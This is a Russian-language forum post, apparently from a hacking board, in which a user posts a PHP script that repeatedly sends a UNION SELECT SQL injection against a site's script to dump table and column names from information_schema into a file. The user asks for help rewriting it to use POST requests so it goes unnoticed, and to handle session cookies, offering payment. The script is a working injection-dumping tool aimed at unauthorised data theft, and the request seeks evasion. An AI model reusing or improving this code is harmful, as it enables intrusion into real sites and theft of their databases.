|
Познающий
Регистрация: 23.05.2008
Сообщений: 84
С нами:
9456679
Репутация:
97
|
|
Привет всем. Ребят, не знал куда написать.Ситуация такая, есть сайт, есть уязвимость в скрипте после авторизации,MySQL 5 ветки.Т.е. снаружи к уязвимому параметру нет доступа, только после ввода логина и пароля. Нужен скрипт для дампа таблиц и полей из бд, есть вот такой
Код:
<?php set_time_limit(0); for($n = 0;$n <= 500;$n++) { $host = 'www.site.com'; $url = fsockopen($host, 80); $req = "GET /script.php?id=-1033901+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,concat(0x3c677261623e,0x3c677261623e,table_schema,0x203a20,table_name,0x203a20,column_name,0x3c2f677261623e2020),29,30,31,32+from+information_schema.columns+limit+$n,1/* HTTP/1.1\r\n"; $req .= "Host: $host\r\n"; $req .= "User-Agent: Opera/9.24 (Windows NT 5.1; U; eng)\r\n"; $req .= "Content-Type: application/x-www-form-urlencoded\r\n"; $req .= "Connection: Close\r\n\r\n"; fputs($url, $req); while (!feof($url)) { unset($buffer); $buffer = fread($url, 1028); $s = strstr($buffer,'<grab>'); $nm = strpos($s,'</grab>'); $result = substr($s,7,$nm - 7); $check = preg_replace("|grab>|", "", $result); #echo $pizdec; file_put_contents("dump.txt", $check, FILE_APPEND); } $ns = "\n"; file_put_contents("dump.txt", $ns, FILE_APPEND); fclose($url); } ?>
в пхп не силён,есть ли возможность переделать скрипт для отсылки запросов к бд POST методом (непаливно), и прикрутить кукисы, чтобы их можно было менять, т.к. время сессии не бесконечно. Или по логину и паролю, хз. Могу заплатить, но не много, сейчас кризис временный =)
Очень на Вас надеюсь. Или хотя бы обьясните как реализовать.
Последний раз редактировалось Imperou$; 17.01.2010 в 19:41..
|